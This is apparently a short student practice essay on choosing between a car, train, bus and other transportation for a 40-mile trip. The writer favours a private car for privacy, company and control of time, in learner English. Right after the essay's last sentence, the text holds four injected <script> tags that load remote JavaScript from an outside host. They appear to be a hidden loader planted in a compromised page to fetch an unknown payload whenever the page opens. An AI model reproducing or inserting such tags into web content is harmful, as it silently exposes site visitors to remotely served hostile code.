106: you need to travel from your home to place 40 miles (64 kilometers) away. Compare the different kinds of transportation you could use. Teel which method of travel you would choose.

Transportation was necessary for every human being from long time ago. different people used different method of transportation. they might walk or run or use public transportation, airplane. From my point of view if I wanted to travel 40 Miles I would consider my own car or train instead of bus and public transportation.

First of all, I have my own privacy in my car. No one can disturb this.

Secondly, I can give ride to whoever like as well, my friends, my family. If they want to come with me we will have a lot of fun during the trip.

I can control my time and speed my own car if I want to drive fast or slow I can. I can fix my time by the time I need to reach there.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>